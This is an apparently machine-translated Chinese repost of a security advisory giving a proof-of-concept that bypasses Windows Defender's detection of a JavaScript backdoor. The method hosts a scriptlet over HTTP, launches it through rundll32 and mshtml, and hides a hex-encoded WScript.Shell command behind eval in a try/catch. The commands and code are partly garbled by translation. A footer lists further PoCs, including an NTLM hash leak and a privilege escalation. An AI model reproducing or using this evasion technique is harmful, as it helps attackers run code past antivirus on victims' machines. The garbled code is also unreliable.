Microsoft Windows Defender旁路- 缓解检测旁路

HackApt-37 Team · 04 9, 2025

[+] Credits: John Page（又名Hyp3rlinx）
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/ad....a_detection_mitigation_mitigation_bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
检测缓解途径
Backdoor:JS/RELVELSE.A
[CVE参考]
N/A。
[安全问题]
早在2022年，我发布了一个POC，以绕过Backdoor:JS/RELVELSE.A在Defender中的检测，但它不再可缓解。
但是，添加一个简单的JavaScript尝试捕获错误语句并评估其在本文时执行的十六进制字符串。
[参考]

https://twitter.com/x/status/1480657623947091968

[漏洞/POC]
1）Python -M http.Server 80
2）打开命令提示作为管理员
3）rundll32 javaScript:'\\ . \\ . \\\\\\\\\\\\\\\\ mshtml \\ . \\ . \\ . \\ mshtml，runhtmlapplication，runhtmlapplication，runhtmlapplication'; document.write.write.write（）
在服务器上创建文件和主机，这是“ yo.tmp”文件的内容。
？XML版本='1.0'？
成分
脚本
尝试{
！[cdata [
VAR HEX='6E65772041637469765584F626A6563742822575757575363726970742E536865656C6C222222222752756E2756E28222636161616C632E62E6522222229''''''''''''''''''''
var str='';
对于（var n=0; n hex.length; n +=2）{
str +=string.fromcharcode（parseint（hex.substr（n，2），16））;
}
评估（str）
]]]]
}捕获（e）{
评估（str）
}
/脚本
/成分
[网络访问]
当地的
[严重性]
高的
[披露时间表]
供应商通知:
2024: 2月18日公开披露
[+]免责声明
本建议中包含的信息“按原样”提供，没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配，只要除了对其进行改革，没有对其进行更改，并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责，并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容（c）。
HYP3RLINX

H	Microsoft Windows Defender-检测缓解旁路Trojanwin32Powessere.g HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows -NTLM哈希泄漏恶意窗户主题 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows 10.0.17763.5458-内核特权升级 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows Defender/trojan.win32/powessere.g-检测缓解旁路 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft OneNote（版本2305 Build 16.0.16501.20074）64位- 欺骗 HackApt-37 Team 04 9, 2025 POC/?Day